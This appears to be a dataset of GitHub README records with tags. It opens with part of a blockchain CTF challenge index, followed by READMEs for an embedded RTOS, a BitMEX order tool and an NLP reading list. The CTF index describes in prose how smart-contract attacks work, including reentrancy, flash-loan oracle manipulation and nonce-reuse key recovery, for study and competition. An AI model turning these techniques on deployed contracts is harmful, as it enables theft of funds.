set view or pure for a function and design your application under the assumption that the state will not change it will be a bug challenge note keywords ethernaut 11 elevator src ethernaut view functions that do not always return same values since view functions can read state they can be conditionally branched based on state and do not necessarily return the same value challenge note keywords ethernaut 21 shop src ethernaut mistakes in setting storage and memory if storage and memory are not set properly old values may be referenced or overwriting may not occur resulting in vulnerability challenge note keywords n1ctf 2021 babydefi cover protocol infinite minting https coverprotocol medium com 12 28 post mortem 34c5f9f718d4 flash loan tracing transactions various information can be obtained just by following the flow of transaction processing blockchain explorers such as etherscan are useful challenge note keywords ethernaut 17 recovery src ethernaut loss of deployed contract address reversing states since the state and the bytecodes of contracts are public all variables including private variables are readable private variables are only guaranteed not to be directly readable by other contracts but we as an entity outside the blockchain can read them challenge note keywords capture the ether guess the random number src capturetheether ethernaut 8 vault src ethernaut ethernaut 12 privacy src ethernaut cipher shastra sherlock 0x41414141 ctf secure enclave src 0x41414141ctf log storage ethernautdao 1 privatedata src ethernautdao privatedata reversing transactions reversing the contents of a transaction or how the state has been changed by the transaction challenge note keywords darkctf secret of the contract src darkctf downunderctf 2022 secret and ephemeral src downunderctf2022 reversing evm bytecodes reversing a contract for which code is not given in whole or in part use a decompiler e g heimdall https github com jon becker heimdall rs panoramix https github com eveem org panoramix and a disassembler e g ethersplay https github com crytic ethersplay challenge note keywords incognito 2 0 ez keep in plain text 0x41414141 ctf crackme sol src 0x41414141ctf decompile 0x41414141 ctf crypto casino src 0x41414141ctf bypass condition check paradigm ctf 2021 babyrev 34c3 ctf chaingang blaze ctf 2018 smart contract def con ctf qualifier 2018 sag pbctf 2020 pbcoin paradigm ctf 2022 stealing sats paradigm ctf 2022 electric sheep paradigm ctf 2022 fun reversing challenge downunderctf 2022 evm vault mechanism src downunderctf2022 ekoparty ctf 2022 byte src ekopartyctf2022 stack tracing ekoparty ctf 2022 smartrev src ekopartyctf2022 memory tracing numen cyber ctf 2023 hexp src numenctf previous block hash gas price 2 24 evm bytecode golf these challenges have a limit on the length of the bytecode to be created challenge note keywords ethernaut 18 magicnumber src ethernaut paradigm ctf 2021 rever src paradigmctf2021 rever palindrome detection in addition the code that inverts the bytecode must also be able to detect palindromes huff challenge challenge 1 src huffchallenge jump oriented programming jump oriented programming jop challenge note keywords seccon ctf 2023 quals tokyo payload https github com minaminao tokyo payload paradigm ctf 2021 jop real world ctf 3rd re montagy gas optimization these challenges have a limit on the gas to be consumed challenge note keywords huff challenge challenge 2 src huffchallenge collisions when using abi encodepacked with variable length arguments challenge note keywords seetf 2023 operation feathered fortune fiasco src seetf2023 bypassing verifications with zero iteration loops challenge note keywords seetf 2023 murky seepass src seetf2023 array length merkle proof reentrancy attacks in case a function of contract a contains interaction with another contract b or ether transfer to b the control is temporarily transferred to b since b can call a in this control it will be a bug if the design is based on the assumption that a is not called in the middle of the execution of that function for example when b executes the withdraw function to withdraw ether deposited in a the ether transfer triggers a control shift to b and during the withdraw function b executes a s withdraw function again even if the withdraw function is designed to prevent withdrawal of more than the limit if it is simply called twice if the withdraw function is executed in the middle of the withdraw function it may be designed to bypass the limit check to prevent reentrancy attacks use the checks effects interactions pattern challenge note keywords capture the ether token bank src capturetheether erc 223 tokenfallback ethernaut 10 re entrancy src ethernaut call paradigm ctf 2021 yield aggregator htb university ctf 2020 quals moneyheist ethernautdao 4 vendingmachine src ethernautdao vendingmachine call defi security summit stanford insecuredexlp src defisecuritysummitstanford erc 223 tokenfallback maplectf 2022 maplebacoin src maplectf quillctf 2023 safenft src quillctf2022 safenft erc721 safemint numen cyber ctf 2023 simplecall src numenctf call seetf 2023 pigeonbank src seetf2023 project sekai ctf 2023 re remix src projectsekaictf2023 read only reentrancy flash loan basics flash loans are uncollateralised loans that allow the borrowing of an asset as long as the borrowed assets are returned before the end of the transaction the borrower can deal with the borrowed assets any way they want within the transaction by making large asset moves attacks can be made to snatch funds from defi applications or to gain large amounts of votes for participation in governance a solution to attacks that use flash loans to corrupt oracle values is to use a decentralized oracle challenge note keywords damn vulnerable defi 1 unstoppable simple flash loan with a single token failure to send the token directly damn vulnerable defi 2 naivereceiver the flashloan function can specify a borrower but the receiver side does not authenticate the tx sender so the receiver s funds can be drained as a fee damn vulnerable defi 3 truster the target of a call is made into the token and the token can be taken by approving it to oneself damn vulnerable defi 4 sideentrance flash loan that allows each user to make a deposit and a withdrawal the deposit can be executed at no cost at the time of the flash loan governance attacks by executing flash loans during snapshots if the algorithm distributes some kind of rights using the token balance at the time of a snapshot and if a malicious user transaction can trigger a snapshot a flash loan can be used to obtain massive rights a period of time to lock the token will avoid this attack challenge note keywords damn vulnerable defi 5 therewarder get reward tokens based on the deposited token balance damn vulnerable defi 6 selfie get voting power in governance based on the deposited token balance bypassing repayments of push architecture flash loans there are two architectures of flash loans push and pull with push architectures represented by uniswap and aave v1 and pull architectures by aave v2 and dydx the proposed flash loan in eip 3156 flash loans https eips ethereum org eips eip 3156 is a pull architecture challenge note keywords paradigm ctf 2021 upgrade bypass using the lending functionality implemented in the token bugs in amm price calculation algorithm a bug in the automated market maker amm price calculation algorithm allows a simple combination of trades to drain funds challenge note keywords ethernaut 22 dex src ethernaut attacks using custom tokens the ability of a protocol to use arbitrary tokens is not in itself a bad thing but it can be an attack vector in addition bugs in the whitelist design which assumes that arbitrary tokens are not available could cause funds to drain challenge note keywords ethernaut 23 dex two src ethernaut oracle manipulation attacks without flash loans it corrupts the value of the oracle and drains the funds of applications that refer to that oracle challenge note keywords paradigm ctf 2021 broker distort uniswap prices and liquidate positions on lending platforms that reference those prices damn vulnerable defi 7 compromised off chain private key leak oracle manipulation oracle manipulation attacks with flash loans the use of flash loans distorts the value of the oracle and drains the funds of the protocols that reference that oracle the ability to move large amounts of funds through a flash loan makes it easy to distort the oracle and cause more damage challenge note keywords damn vulnerable defi 8 puppet distort the price of uniswap v1 and leak tokens from a lending platform that references that price defi security summit stanford borrowsysteminsecureoracle src defisecuritysummitstanford lending protocol sandwich attacks for example if there is a transaction by another party to sell token a and buy b the attacker can put in a transaction to sell a and buy b before the transaction and later put in a transaction to sell the same amount of b and buy a thereby ultimately increasing the amount of a at a profit in general such revenue earned by selecting inserting and reordering transactions contained in a block generated by a miner is referred to as miner extractable value mev recently it is also called maximal extractable value challenge note keywords paradigm ctf 2021 farmer src paradigmctf2021 sandwich the trade from comp to weth to dai recoveries of private keys by same nonce attacks in general a same nonce attack is possible when the same nonce is used for different messages in the elliptic curve dsa ecdsa and the secret key can be calculated in ethereum if nonces used to sign transactions are the same this attack is feasible challenge note keywords capture the ether account takeover src capturetheether paradigm ctf 2021 babycrypto src paradigmctf2021 metatrust ctf ecdsa src metatrustctf ecdsa brute forcing addresses brute force can make a part of an address a specific value challenge note keywords capture the ether fuzzy identity src capturetheether 28 bits create2 numen cyber ctf 2023 exist src numenctf 16 bits recoveries of public keys the address is the public key applied to a keccak256 hash and the public key cannot be recovered from the address if even one transaction has been sent the public key can be back calculated from it specifically it can be recovered from the recursive length prefix rlp encoded data nonce gas price gas to value data chain id 0 0 and the signature v r s challenge note keywords capture the ether public key src capturetheether rlp ecdsa encryption and decryption in secp256k1 challenge note keywords 0x41414141 ctf rich club src 0x41414141ctf dex flash loan bypassing bots and taking erc 20 tokens owned by wallets with known private keys if a wallet with a known private key has an erc 20 token but no ether it is usually necessary to first send ether to the wallet and then transfer the erc 20 token to get the erc 20 token however if a bot that immediately takes the ether sent at this time is running the ether will be stolen when the ether is simply sent in this situation we can use flashbots https docs flashbots net bundled transactions or just permit and transferfrom if the token is eip 2612 permit https eips ethereum org eips eip 2612 friendly challenge note keywords ethernautdao 5 ethernautdaotoken src ethernautdao ethernautdaotoken claimable intermediate nodes of merkle trees challenge note keywords paradigm ctf 2022 merkledrop src paradigmctf2022 precompiled contracts challenge note keywords paradigm ctf 2022 vanity src paradigmctf2022 faking errors challenge note keywords ethernaut 27 good samaritan src ethernaut foundry cheatcodes challenge note keywords paradigm ctf 2022 trapdooor src paradigmctf2022 paradigm ctf 2022 trapdoooor front running challenge note keywords downunderctf 2022 private log src downunderctf2022 back running mev share can be used to create bundled transactions to back run challenge note keywords mev share ctf mevsharectfsimple 1 src mevsharectf mev share ctf mevsharectfsimple 2 src mevsharectf mev share ctf mevsharectfsimple 3 src mevsharectf mev share ctf mevsharectfsimple 4 src mevsharectf mev share ctf mevsharectfmagicnumberv1 src mevsharectf mev share ctf mevsharectfmagicnumberv2 src mevsharectf mev share ctf mevsharectfmagicnumberv3 src mevsharectf mev share ctf mevsharectfnewcontract address src mevsharectf mev share ctf mevsharectfnewcontract salt src mevsharectf create2 head overflow bugs in calldata tuple abi reencoding solidity 0 8 16 see https blog soliditylang org 2022 08 08 calldata tuple reencoding head overflow bug challenge note keywords 0ctf 2022 tctf nft market src 0ctf2022 tctfnftmarket numen cyber ctf 2023 wallet src numenctf illegal v in ecrecover overwriting storage slots via local storage variables solidity 0 8 1 in foo storage foo the local variable foo points to slot 0 challenge note keywords capture the ether donation src capturetheether overwriting arbitrary storage slots by setting array lengths to 2 256 1 solidity 0 6 0 for example any storage variable can be overwritten by negatively arithmetic overflowing the length of an array to 2 256 1 it need not be due to overflow the length property has been read only since v0 6 0 challenge note keywords capture the ether mapping src capturetheether ethernaut 19 alien codex src ethernaut paradigm ctf 2021 bank constructors that is just functions by typos solidity 0 5 0 in versions before v0 4 22 the constructor is defined as a function with the same name as the contract so a typo of the constructor name could cause it to become just a function resulting in a bug since v0 5 0 this specification is removed and the constructor keyword must be used challenge note keywords capture the ether assume ownership src capturetheether ethernaut 2 fallout src ethernaut overwriting storage slots via uninitialized storage pointer solidity 0 5 0 since v0 5 0 uninitialized storage variables are forbidden so this bug cannot occur challenge note keywords capture the ether fifty years src capturetheether ethernaut locked deleted https forum openzeppelin com t ethernaut locked with solidity 0 5 1115 other ad hoc vulnerabilities and methods challenge note keywords paradigm ctf 2021 bouncer src paradigmctf2021 bouncer the funds required for batch processing are the same as for single processing paradigm ctf 2021 market make the value of one field be recognized as the value of another field by using key misalignment in the eternal storage pattern ethernautdao 2 walletlibrary src ethernautdao walletlibrary m and n of m of n multisig wallet can be changed paradigm ctf 2022 rescue src paradigmctf2022 paradigm ctf 2022 just in time paradigm ctf 2022 0xmonaco balsnctf 2022 src balsnctf2022 initialize safetransferfrom create2 numen cyber ctf 2023 lenderpool src numenctf flash loan numen cyber ctf 2023 goatfinance src numenctf check sum address seetf 2023 pigeon vault src seetf2023 eip 2535 diamonds multi facet proxy corctf 2023 baby wallet src corctf2023 missing from to check bitcoin note including challenges of bitcoin variants whose transaction model is unspent transaction output utxo bitcoin basics challenge note keywords tsukuctf 2021 genesis genesis block wormcon 0x01 what s my wallet address bitcoin address ripemd 160 recoveries of private keys by same nonce attacks there was a bug and it has been fixed using rfc6979 https datatracker ietf org doc html rfc6979 https github com daedalus bitcoin recover privkey challenge note keywords darkctf duplicacy within src darkctf bypassing pow of other applications using bitcoin s pow database bitcoin uses a series of leading zeros in the sha 256 hash value as a proof of work pow but if other applications are designed in the same way its pow time can be significantly reduced by choosing one that matches the conditions from bitcoin s past pow results challenge note keywords dragon ctf 2020 bit flip 2 64 bit pow cairo challenge note keywords paradigm ctf 2022 riddle of the sphinx src paradigmctf2022 contract call paradigm ctf 2022 cairo proxy src paradigmctf2022 integer overflow paradigm ctf 2022 cairo auction src paradigmctf2022 uint256 balsnctf 2022 cairo reverse src balsnctf2022 reversing solana challenge note keywords alles ctf 2021 secret store solana spl token alles ctf 2021 legit bank alles ctf 2021 bugchain alles ctf 2021 ebpf reversing ebpf paradigm ctf 2022 otterworld src paradigmctf2022 paradigm ctf 2022 otterswap src paradigmctf2022 paradigm ctf 2022 pool paradigm ctf 2022 solhana 1 paradigm ctf 2022 solhana 2 paradigm ctf 2022 solhana 3 corctf 2023 tribunal project sekai ctf 2023 the bidding project sekai ctf 2023 play for free move challenge note keywords numen cyber ctf 2023 move to checkin src numenctf contract call in sui numen cyber ctf 2023 chatgpt tell me where is the vulnerability src numenctf osint numen cyber ctf 2023 move to crackme src numenctf reversing move code and linux executable other blockchain related things that are not directly related to blockchains but are part of the ecosystems challenge note keywords tsukuctf 2021 interplanetary protocol ipfs address base32 in lowercase
ctf blockchain ethereum solidity evm
blockchain
yaos
yaos codacy badge https api codacy com project badge grade 69c0ee97ee2843d9ac4b415d9ee21b6f https app codacy com app onkwon yaos utm source github com utm medium referral utm content onkwon yaos utm campaign badge grade dashboard fossa status https app fossa io api projects git 2bgithub com 2fonkwon 2fyaos svg type shield https app fossa io projects git 2bgithub com 2fonkwon 2fyaos ref badge shield yaos is an embedded operating system for internet of things iot devices specifically for a single core processor without mmu virtualization it is designed for energy efficiency and hardware independent development refer to documentation directory for more information such as compiling porting apis etc any feedback is welcome to kwon toanyone net and let me know if any of you are interested in porting to new mcu so that i can give you a hand getting started 1 download yaos git clone git github com onkwon yaos 2 get a toolchain get one from here https launchpad net gcc arm embedded if you don t have one installed yet or you can compile it from source code putting more effort which is not recommended but still worth trying 3 build stm32 make clean make stm32f1 or specify your board e g mango z1 make make burn supported boards at the moment are mango z1 http www mangoboard com main cate1 9 cate2 26 cate3 36 mycortex stm32f4 http www withrobot com mycortex stm32f4 nrf52 https www nordicsemi com eng products bluetooth low energy nrf52832 stm32f429i disco http www st com content st com en products evaluation tools product evaluation tools mcu eval tools stm32 mcu eval tools stm32 mcu discovery kits 32f429idiscovery html stm32f469i disco http www st com en evaluation tools 32f469idiscovery html stm32 lcd https www olimex com products arm st stm32 lcd ust mpb stm32f103 https www devicemart co kr 1089642 stm32f1 min https www aliexpress com item mini stm32f103c8t6 system board stm32 learning development board 1609777521 html in case of getting error messages something like undefined reference to aeabi uidiv specify library path when you make in the way below make ld library path usr local arm lib gcc arm none eabi 4 9 2 the path is dependent on your development environment user task example let me put an example of blinking a led for you to take a taste of how the code look like user tasks would be placed under tasks e g tasks my first task c void main int fd led 0 if fd open dev gpio20 o wronly 0 printf can not open x n fd return while 1 write fd led 1 led 1 sleep 1 close fd register task main 0 default priority stack size default features task management and scheduling two types of task are handled normal and real time tasks round robin scheduler for normal tasks while priority scheduler for real time tasks each task is given a priority which can be dynamically changed with set task pri for real time tasks a higher priority task always preempts lower priority tasks while the same priority tasks take place in turn under round robin scheduling scheduler can be stopped to reduce even the scheduling overhead in case of a time critical task on the other hand normal tasks get chance to run by simplified fair scheduler that picks the minimum value of runtime up for the next task to run tasks are always in one of five states running stopped waiting sleeping or zombie and a task can be created both statically and dynamically at run time system call interface system resource is accessed by the system call interface entering privileged mode as a user task runs in user unprivileged mode virtual file system the concept of virtual file system vfs is implemented the embedded flash rom in soc can be mounted as the root file system embedfs while a ramfs is mounted as a devfs for a device node empty flash memory is registerd as embedfs so that user can use it just like normal file system memory management page is unit of memory management but alternative memory manager can be used in such a system of memory shortage buddy allocator and first fit allocator are implemented deferred interrupt servicing softirq softirqs will preempt any work except the response to a real interrupt as they run at a high priority in fact softirq is just a kernel task running with interrupts enabled and can sleep but has the highest priority amongst running tasks synchronization synchronization primitives such as semaphore spinlock etc blocking non blocking i o operations device driver license fossa status https app fossa io api projects git 2bgithub com 2fonkwon 2fyaos svg type large https app fossa io projects git 2bgithub com 2fonkwon 2fyaos ref badge large
os rtos iot embedded arm cortex-m mcu microcontroller
os
Radazin
radazin information technology company created by reza naeemi framework django database posgresql
server
bitmex-scaled-orders
bitmex scaled orders a tool for creating scaled orders bulk orders on bitmex preview https i imgur com kfsqzlh png video demo https streamable com 8kikxz you should only run this locally table of contents features features requirements requirements startup startup tests tests changelog changelog todo todo maybe maybe features generate limit buy sell orders based on a set of variables amount number of orders upper price and lower price spread amount evenly increasingly or decreasingly supports all bitmex instruments view current positions view and cancel current orders retry on overload until successful supports testnet and production requirements nodejs 8 5 startup download latest release from https github com nice table bitmex scaled orders releases latest or clone the project open a terminal and run the following from the project folder npm install when npm install has finished we are ready to start the app run this in a terminal npm run startup app should open in your browser automatically and render when ready upgrading upgrading should be as simple as overwriting the source code or pulling latest followed by a npm install in terminal app is then ready and can be started with npm run startup development when doing dev work i run npm start in one terminal and npm run proxy dev in another tests tests can be run in a terminal npm test changelog for changelog see https github com nice table bitmex scaled orders releases todo warn user if one or more orders may be executed as a market order maybe other order types strategies https www sierrachart com index php page doc ordertypes html moon
front_end
awesome-neural-adaptation-in-NLP
awesome neural adaptation in nlp mit license https img shields io badge license mit green svg https opensource org licenses mit awesome https cdn rawgit com sindresorhus awesome d7305f38d29fed78fa85652e3a63e154dd8e8829 media badge svg https github com sindresorhus awesome a curated list of awesome work on neural unsupervised domain adaptation in natural language processing including links to papers the focus is on unsupervised neural da methods and currently on work outside machine translation feel free to contribute by creating a pull request as outlined in contributing md contributing md taxonomy image https github com bplank awesome neural adaptation in nlp blob master taxonomy png raw true please cite our survey paper https arxiv org abs 2006 00632 ramponi and plank coling 2020 https www aclweb org anthology 2020 coling main 603 if you find it useful in your research inproceedings ramponi plank 2020 neural title neural unsupervised domain adaptation in nlp a survey author ramponi alan and plank barbara booktitle proceedings of the 28th international conference on computational linguistics month dec year 2020 address barcelona spain online publisher international committee on computational linguistics url https www aclweb org anthology 2020 coling main 603 doi 10 18653 v1 2020 coling main 603 pages 6838 6855 contents surveys surveys collections collections unsupervised da unsupervised da by methods by methods model centric methods model centric methods feature centric methods feature centric loss centric methods loss centric data centric methods data centric methods pseudo labeling methods pseudo labeling data selection methods data selection pre training methods pre training hybrid methods hybrid methods by tasks by tasks classification inference classification inference sentiment analysis sentiment analysis language identification language identification binary text classification binary text classification machine reading machine reading duplicate question detection duplicate question detection stance detection stance detection political data identification political data identification question answering question answering summarization summarization structured prediction structured prediction natural language inference natural language inference part of speech tagging pos tagging dependency parsing dependency parsing named entity recognition named entity recognition event extraction event extraction relation extraction relation extraction surveys overview of surveys in other areas and related topics machine learning a survey on transfer learning pan yang 2010 ieee https sci hub tw 10 1109 msp 2014 2347059 vision deep visual domain adaptation a survey wang deng neurocomputing 2018 https arxiv org abs 1802 03601v4 generalizing to unseen domains a survey on domain generalization wang et al 2021 technical report arxiv https arxiv org abs 2103 03097 machine translation a survey of domain adaptation for neural machine translation chu wang coling 2018 https www aclweb org anthology c18 1111 pdf pre neural surveys on domain adaptation in nlp domain adaptation in natural language processing jiang 2008 phd dissertation chapter 2 https www ideals illinois edu handle 2142 10870 a literature survey on domain adaptation of statistical classifiers jiang 2008 technical report http www mysmu edu faculty jingjiang papers da survey pdf domain adaptation for parsing plank 2011 phd dissertation chapter 3 https www rug nl research portal files 10469724 03c3 pdf transfer learning for nlp neural transfer learning for nlp ruder 2019 phd dissertation https ruder io thesis neural transfer learning for nlp pdf low resource nlp a survey on recent approaches for natural language processing in low resource scenarios hedderich et al 2020 https arxiv org abs 2010 12309 cross lingual learning a survey of cross lingual word embedding models ruder vuli s gaard jair 2019 https www jair org index php jair article view 11640 multi task learning an overview of multi task learning in deep neural networks ruder arxiv 2017 https arxiv org abs 1706 05098 domain divergence domain divergences a survey and empirical analysis kashyap et al 2020 https arxiv org abs 2010 12198 collections related awesome collections awesome domain adaptation https github com zhaoxin94 awesome domain adaptation nlp progress page for domain adaptation http nlpprogress com english domain adaptation html awesome datascience https github com academic awesome datascience the nlp pandect https github com ivan bilan the nlp pandect unsupervised da by methods a list of papers categorized by methods model centric methods neural structural correspondence learning for domain adaptation ziser and reichart conll 2017 https www aclweb org anthology k17 1040 deep pivot based modeling for cross language cross domain transfer with minimal guidance ziser and reichart emnlp 2018a https www aclweb org anthology d18 1022 pivot based language modeling for improved neural domain adaptation ziser and reichart naacl hlt 2018b https www aclweb org anthology n18 1112 task refinement learning for improved accuracy and stability of unsupervised domain adaptation ziser and reichart acl 2019 https www aclweb org anthology p19 1591 simplified neural unsupervised domain adaptation miller naacl hlt 2019 https www aclweb org anthology n19 1039 domain adaptation for large scale sentiment classification a deep learning approach glorot et al icml 2011 https icml cc 2011 papers 342 icmlpaper pdf marginalized denoising autoencoders for domain adaptation chen et al icml 2012 https icml cc 2012 papers 416 pdf fast easy unsupervised domain adaptation with marginalized structured dropout yang and eisenstein acl 2014 https www aclweb org anthology p14 2088 a domain adaptation regularization for denoising autoencoders clinchant et al acl 2016 https www aclweb org anthology p16 2005 domain adversarial training of neural networks ganin et al jmlr 2016 https jmlr org papers volume17 15 239 15 239 pdf end to end adversarial memory network for cross domain sentiment classification li et al ijcai 2017 https www ijcai org proceedings 2017 0311 pdf adversarial adaptation of synthetic or stale data kim et al acl 2017 https www aclweb org anthology p17 1119 adversarial training for cross domain universal dependency parsing sato et al conll 2017 https www aclweb org anthology k17 3007 adversarial training for relation extraction wu et al emnlp 2017 https www aclweb org anthology d17 1187 robust multilingual part of speech tagging via adversarial training yasunaga et al naacl hlt 2018 https www aclweb org anthology n18 1089 wasserstein distance guided representation learning for domain adaptation shen et al aaai 2018 https arxiv org abs 1707 01217 what s in a domain learning domain robust text representations using adversarial training li et al naacl hlt 2018 https www aclweb org anthology n18 2076 domain adaptation with adversarial training and graph embeddings alam et al acl 2018 https www aclweb org anthology p18 1099 adversarial domain adaptation for machine reading comprehension wang et al emnlp ijcnlp 2019 https www aclweb org anthology d19 1254 adversarial domain adaptation for duplicate question detection shah et al emnlp 2018 https www aclweb org anthology d18 1131 domain adaptation for relation extraction with domain adversarial neural network fu et al ijcnlp 2017 https www aclweb org anthology i17 2072 generalizing biomedical relation classification with neural adversarial domain adaptation rios et al bioinf 2018 https academic oup com bioinformatics article 34 17 2973 4953706 adversarial domain adaptation for stance detection xu et al arxiv 2019 https arxiv org abs 1902 02401 genre separation network with adversarial training for cross genre relation extraction shi et al emnlp 2018 https www aclweb org anthology d18 1125 a comparative analysis of unsupervised language adaptation methods rocha lopes cardoso deeplo 2019 https www aclweb org anthology d19 6102 kingdom knowledge guided domain adaptation for sentiment analysis ghosal et al acl 2020 https www aclweb org anthology 2020 acl main 292 towards open domain event trigger identification using adversarial domain adaptation naik rose acl 2020 https www aclweb org anthology 2020 acl main 681 transformer based multi source domain adaptation wright and augenstein emnlp 2020 https arxiv org pdf 2009 07806 pdf unsupervised cross lingual adaptation of dependency parsers using crf autoencoders li and tu findings of emnlp 2020 https www aclweb org anthology 2020 findings emnlp 193 effective unsupervised domain adaptation with adversarially trained language models vu et al emnlp 2020 https www aclweb org anthology 2020 emnlp main 497 inexpensive domain adaptation of pretrained language models case studies on biomedical ner and covid 19 qa poerner et al findings of emnlp 2020 https www aclweb org anthology 2020 findings emnlp 134 adapting event extractors to medical data bridging the covariate shift naik et al eacl 2021 https aclanthology org 2021 eacl main 258 pdf data centric methods unsupervised domain adaptation of contextualized embeddings for sequence labeling han eisenstein emnlp ijcnlp 2019 https www aclweb org anthology d19 1433 semi supervised domain adaptation for dependency parsing li et al acl 2019 https www aclweb org anthology p19 1229 adaptive ensembling unsupervised domain adaptation for political document analysis desai et al emnlp ijcnlp 2019 https www aclweb org anthology d19 1478 don t stop pretraining adapt language models to domains and tasks gururangan et al acl 2020 https www aclweb org anthology 2020 acl main 740 end to end synthetic data generation for domain adaptation of question answering systems shakeri et al emnlp 2020 https www aclweb org anthology 2020 emnlp main 439 feature adaptation of pre trained language models across languages and domains with robust self training ye et al emnlp 2020 https www aclweb org anthology 2020 emnlp main 599 udalm unsupervised domain adaptation through language modeling karouzos et al naacl 2021 https www aclweb org anthology 2021 naacl main 203 pdf n b similar to aux mlm which was contemporaneously proposed for cross lingual learning by van der goot et al 2021 naacl https www aclweb org anthology 2021 naacl main 197 pdf adapting event extractors to medical data bridging the covariate shift naik et al eacl 2021 https aclanthology org 2021 eacl main 258 pdf hybrid methods asymmetric tri training for unsupervised domain adaptation saito et al icml 2017 http proceedings mlr press v70 saito17a html strong baselines for neural semi supervised learning under domain shift ruder plank acl 2018 https www aclweb org anthology p18 1096 cross domain ner using cross domain language modeling jia et al acl 2019 https www aclweb org anthology p19 1236 deep contextualized self training for low resource dependency parsing rotman reichart tacl 2019 https www mitpressjournals org doi full 10 1162 tacl a 00294 self adaptation for unsupervised domain adaptation cui bollegala ranlp 2019 https www aclweb org anthology r19 1025 multi task domain adaptation for sequence tagging peng dredze repl4nlp 2017 https www aclweb org anthology w17 2612 multi source domain adaptation for text classification via distancenet bandits guo et al aaai 2020 https arxiv org abs 2001 04362 perl pivot based domain adaptation for pre trained deep contextualized embedding models ben david et al tacl 2020 https arxiv org abs 2006 09075 unsupervised adaptation of question answering systems via generative self training rennie et al emnlp 2020 https www aclweb org anthology 2020 emnlp main 87 by tasks a list of papers categorized by tasks classification inference all papers pertaining to classification and inference tasks are indicated in the respective sections below sentiment analysis neural structural correspondence learning for domain adaptation ziser and reichart conll 2017 https www aclweb org anthology k17 1040 deep pivot based modeling for cross language cross domain transfer with minimal guidance ziser and reichart emnlp 2018a https www aclweb org anthology d18 1022 pivot based language modeling for improved neural domain adaptation ziser and reichart naacl hlt 2018b https www aclweb org anthology n18 1112 task refinement learning for improved accuracy and stability of unsupervised domain adaptation ziser and reichart acl 2019 https www aclweb org anthology p19 1591 simplified neural unsupervised domain adaptation miller naacl hlt 2019 https www aclweb org anthology n19 1039 domain adaptation for large scale sentiment classification a deep learning approach glorot et al icml 2011 https icml cc 2011 papers 342 icmlpaper pdf marginalized denoising autoencoders for domain adaptation chen et al icml 2012 https icml cc 2012 papers 416 pdf a domain adaptation regularization for denoising autoencoders clinchant et al acl 2016 https www aclweb org anthology p16 2005 domain adversarial training of neural networks ganin et al jmlr 2016 https jmlr org papers volume17 15 239 15 239 pdf end to end adversarial memory network for cross domain sentiment classification li et al ijcai 2017 https www ijcai org proceedings 2017 0311 pdf wasserstein distance guided representation learning for domain adaptation shen et al aaai 2018 https arxiv org abs 1707 01217 what s in a domain learning domain robust text representations using adversarial training li et al naacl hlt 2018 https www aclweb org anthology n18 2076 a comparative analysis of unsupervised language adaptation methods rocha lopes cardoso deeplo 2019 https www aclweb org anthology d19 6102 kingdom knowledge guided domain adaptation for sentiment analysis ghosal et al acl 2020 https www aclweb org anthology 2020 acl main 292 don t stop pretraining adapt language models to domains and tasks gururangan et al acl 2020 https www aclweb org anthology 2020 acl main 740 asymmetric tri training for unsupervised domain adaptation saito et al icml 2017 http proceedings mlr press v70 saito17a html strong baselines for neural semi supervised learning under domain shift ruder plank acl 2018 https www aclweb org anthology p18 1096 self adaptation for unsupervised domain adaptation cui bollegala ranlp 2019 https www aclweb org anthology r19 1025 multi source domain adaptation for text classification via distancenet bandits guo et al aaai 2020 https arxiv org abs 2001 04362 perl pivot based domain adaptation for pre trained deep contextualized embedding models ben david et al tacl 2020 https arxiv org abs 2006 09075 feature adaptation of pre trained language models across languages and domains with robust self training ye et al emnlp 2020 https www aclweb org anthology 2020 emnlp main 599 udalm unsupervised domain adaptation through language modeling karouzos et al naacl 2021 https www aclweb org anthology 2021 naacl main 203 pdf language identification what s in a domain learning domain robust text representations using adversarial training li et al naacl hlt 2018 https www aclweb org anthology n18 2076 binary text classification a domain adaptation regularization for denoising autoencoders clinchant et al acl 2016 https www aclweb org anthology p16 2005 adversarial adaptation of synthetic or stale data kim et al acl 2017 https www aclweb org anthology p17 1119 domain adaptation with adversarial training and graph embeddings alam et al acl 2018 https www aclweb org anthology p18 1099 don t stop pretraining adapt language models to domains and tasks gururangan et al acl 2020 https www aclweb org anthology 2020 acl main 740 transformer based multi source domain adaptation wright and augenstein emnlp 2020 https arxiv org pdf 2009 07806 pdf machine reading adversarial domain adaptation for machine reading comprehension wang et al emnlp ijcnlp 2019 https www aclweb org anthology d19 1254 duplicate question detection adversarial domain adaptation for duplicate question detection shah et al emnlp 2018 https www aclweb org anthology d18 1131 stance detection adversarial domain adaptation for stance detection xu et al arxiv 2019 https arxiv org abs 1902 02401 political data identification adaptive ensembling unsupervised domain adaptation for political document analysis desai et al emnlp ijcnlp 2019 https www aclweb org anthology d19 1478 question answering unsupervised adaptation of question answering systems via generative self training rennie et al emnlp 2020 https www aclweb org anthology 2020 emnlp main 87 end to end synthetic data generation for domain adaptation of question answering systems shakeri et al emnlp 2020 https www aclweb org anthology 2020 emnlp main 439 summarization adaptsum towards low resource domain adaptation forabstractive summarization yu et al naacl 2021 https www aclweb org anthology 2021 naacl main 471 pdf structured prediction all papers pertaining to structured prediction tasks are indicated in the respective sections below natural language inference a comparative analysis of unsupervised language adaptation methods rocha lopes cardoso deeplo 2019 https www aclweb org anthology d19 6102 don t stop pretraining adapt language models to domains and tasks gururangan et al acl 2020 https www aclweb org anthology 2020 acl main 740 part of speech tagging fast easy unsupervised domain adaptation with marginalized structured dropout yang and eisenstein acl 2014 https www aclweb org anthology p14 2088 robust multilingual part of speech tagging via adversarial training yasunaga et al naacl hlt 2018 https www aclweb org anthology n18 1089 unsupervised domain adaptation of contextualized embeddings for sequence labeling han eisenstein emnlp ijcnlp 2019 https www aclweb org anthology d19 1433 strong baselines for neural semi supervised learning under domain shift ruder plank acl 2018 https www aclweb org anthology p18 1096 multi task domain adaptation for sequence tagging peng dredze repl4nlp 2017 https www aclweb org anthology w17 2612 dependency parsing adversarial training for cross domain universal dependency parsing sato et al conll 2017 https www aclweb org anthology k17 3007 semi supervised domain adaptation for dependency parsing li et al acl 2019 https www aclweb org anthology p19 1229 deep contextualized self training for low resource dependency parsing rotman reichart tacl 2019 https www mitpressjournals org doi full 10 1162 tacl a 00294 unsupervised cross lingual adaptation of dependency parsers using crf autoencoders li and tu findings of emnlp 2020 https www aclweb org anthology 2020 findings emnlp 193 named entity recognition adversarial adaptation of synthetic or stale data kim et al acl 2017 https www aclweb org anthology p17 1119 towards open domain event trigger identification using adversarial domain adaptation naik rose acl 2020 https www aclweb org anthology 2020 acl main 681 unsupervised domain adaptation of contextualized embeddings for sequence labeling han eisenstein emnlp ijcnlp 2019 https www aclweb org anthology d19 1433 cross domain ner using cross domain language modeling jia et al acl 